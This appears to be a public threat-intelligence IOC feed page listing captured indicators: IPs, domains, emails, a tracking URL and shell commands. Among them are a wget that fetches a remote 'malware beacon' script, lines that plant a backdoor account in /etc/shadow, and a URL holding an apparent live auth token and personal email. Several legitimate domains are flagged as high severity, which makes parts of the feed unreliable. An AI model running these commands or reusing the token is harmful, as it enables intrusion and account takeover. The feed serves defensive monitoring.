IOC Browser
Delayed public intelligence feed pulled from the live database
Browse real indicators without authentication. Public results are delayed by 72 hours; paid plans remove that delay and unlock the full API.
Visible IOCs
1.6K
IOC Types
10
Updated
6 hours ago
3.3M
Events Captured
2,367
Active Attackers (24h)
21.1K
Credentials Captured
4
Global Edge Nodes
Public Filter Set
Results visible through Apr 11, 2026. Upgrade for real-time delivery.
| Type | Value | Confidence | Severity | First Seen | Last Seen |
|---|---|---|---|---|---|
| command | wget http://100.103.116.44:9999/test_malware_beacon.sh | 70 | medium | Apr 6, 2026 | Apr 6, 2026 |
| command | if ! echo systemx:\$6\$97bAjPBL\$LWTjOvlIt645bflwh0d2d4j7GaxunVgoHbhzIvnyNkdjM3zl0H8sUZ7PVDRKCJBB.n2I1HjeH4zV4wFA./yyI0:18359:::::: >> /etc/shadow; then | 70 | medium | Apr 5, 2026 | Apr 5, 2026 |
| command | if [[ -z $(grep "^systemx:" /etc/shadow 2>/dev/null) ]]; then | 70 | medium | Apr 5, 2026 | Apr 5, 2026 |
| ip | 3.248.128.90 | 85 | high | Apr 5, 2026 | Apr 5, 2026 |
| ip | 52.50.126.37 | 85 | high | Apr 5, 2026 | Apr 5, 2026 |
| ip | 52.209.244.250 | 85 | high | Apr 5, 2026 | Apr 5, 2026 |
| url | https://track.pstmrk.it/3ts/haltstate.ai%2Fhaltstate%2Fauth%2Fverify%3Ftoken%3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiJrcnlzdGFsLXVuaXR5IiwiZW1haWwiOiJlcmlrQGtyeXN0YWx1bml0eS5jb20iLCJ0eXBlIjoibWFnaWMiLCJleHAiOjE3NzUzNDY3ODZ9.CMxMKDMK0N7lpnUg5MjDKPN2ItjUFjBl-04OELBDD58/xaQGAQ/i3vEAQ/AQ/9d3a5e37-bec7-413b-8621-62cfcda59266/1/K8rdyV0Ktw | 85 | high | Apr 5, 2026 | Apr 5, 2026 |
| domain | track.pstmrk.it | 85 | high | Apr 5, 2026 | Apr 5, 2026 |
pm_bounces@pm-bounces.krystalunity.com | 85 | high | Apr 5, 2026 | Apr 5, 2026 | |
| domain | pm-bounces.krystalunity.com | 85 | high | Apr 5, 2026 | Apr 5, 2026 |
kirovanderson@gmail.com | 95 | high | Apr 3, 2026 | Apr 3, 2026 | |
gearinelise@gmail.com | 95 | high | Apr 3, 2026 | Apr 3, 2026 | |
| domain | gmail.com | 95 | high | Apr 3, 2026 | Apr 3, 2026 |
noreply@ces.cisco.com | 85 | medium | Apr 3, 2026 | Apr 3, 2026 | |
| domain | dh1564-euq1.ap.iphmx.com | 85 | medium | Apr 3, 2026 | Apr 3, 2026 |
| domain | ces.cisco.com | 85 | medium | Apr 3, 2026 | Apr 3, 2026 |
xejp4h@psrp.sellwithboost.com | 85 | medium | Mar 28, 2026 | Apr 2, 2026 | |
info@centroaztlan.org | 70 | medium | Apr 1, 2026 | Apr 1, 2026 | |
| domain | centroaztlan.org | 70 | medium | Apr 1, 2026 | Apr 1, 2026 |
noreply@norton.com | 85 | high | Apr 1, 2026 | Apr 1, 2026 | |
| domain | norton.com | 85 | high | Apr 1, 2026 | Apr 1, 2026 |
geek_squad_support@bestbuy.com | 85 | high | Apr 1, 2026 | Apr 1, 2026 | |
| domain | bestbuy.com | 85 | high | Apr 1, 2026 | Apr 1, 2026 |
| ip | 170.114.52.3 | 85 | high | Apr 1, 2026 | Apr 1, 2026 |
| ip | 2407:30c0:182::aa72:3403 | 85 | high | Apr 1, 2026 | Apr 1, 2026 |